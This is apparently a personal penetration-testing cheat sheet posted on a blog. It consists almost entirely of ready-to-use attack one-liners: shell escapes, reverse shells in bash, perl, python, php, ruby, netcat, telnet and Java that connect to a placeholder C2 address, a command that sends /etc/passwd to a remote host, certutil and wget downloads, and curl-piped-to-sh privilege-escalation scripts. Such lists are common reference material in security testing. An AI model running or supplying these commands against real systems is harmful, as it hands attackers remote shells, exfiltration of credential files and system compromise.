To see the world, things dangerous to come to, to see behind walls, draw closer, to find each other and to feel. That is the purpose of life.
– Life Magazine
Simple Cheatsheet useful for me.
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
echo 'os.system('/bin/bash')'
/bin/sh -i
/bin/bash -i
perl -e 'exec "/bin/sh";'
:!bash
:set shell=/bin/bash:shell
nmap --interactive
!sh
os.execute('/bin/sh')
exec "/bin/sh"
exec "/bin/sh"
bash -i >& /dev/tcp/$c2ip/$c2port 0>&1
0<&196;exec 196<>/dev/tcp/$c2ip/$c2port; sh <&196 >&196 2>&196
perl -e 'use Socket;$i="$c2ip";$p=$c2port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"$c2ip:$c2port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"$c2ip:$c2port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$c2ip",$c2port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("$c2ip",$c2port);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("$c2ip",$c2port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("$c2ip","$c2port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'c=TCPSocket.new("$c2ip","$c2port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
nc -e /bin/sh $c2ip $c2port
nc -c /bin/sh $c2ip $c2port
/bin/sh | nc $c2ip $c2port
rm -f /tmp/p; mknod /tmp/p p && nc $c2ip $c2port 0/tmp/p
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $c2ip $c2port >/tmp/f
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/$c2ip/$c2port;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()
rm -f /tmp/p; mknod /tmp/p p && telnet $c2ip $c2port 0/tmp/p
telnet $c2ip $c2port | /bin/bash | telnet $c2ip $c2port # Remember to listen on your machine also on port $c2port/tcp
python -m SimpleHTTPServer 80
python3 -m http.server 80
python -m pyftpdlib -p 21 # FTP
wget http://<ip>:<port>/stuff.txt
nc -nvlp <port> file # redirect into new file
nc <ip> <port> < file
wget --post-file=/etc/passwd <ip>:<port> tail -n +10 file > clean_file # delete transfer data
C:\Users\<user>>certutil -rulcache -f http://<ip>:<port>/secrets.txt secrets.txt
C:\Users\<user>>ftpftp> get <file>
#!/bin/bash echo Obtaining ports... ports=$(nmap -p- --min-rate 1000 -T4 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) echo Ports obtained! echo Scanning... nmap -sC -sV -Pn -p $ports $1 $2 $3
reconnaissance.sh 192.168.1.1 -oX nmap.xml
Linux Enumeration
curl -L https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh
Linux Privilege Escalation Awesome Script
curl -L https://n4pst3r.me/linpeas.sh | sh
Windows Privilege Escalation Awesome Script
Downlaod the Github repo
git clone https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
Follow the instructions on how to build your own executable or using the default ones (x64/x86).
Then downlaod WinPeas to the system you want to test, and run it as winpeas.exe
| Social | Link |
|---|---|
| Social | Link |
| @LudovicoLoreti | |
| @LudovicoLoreti | |
| Github | @LudovicoLoreti |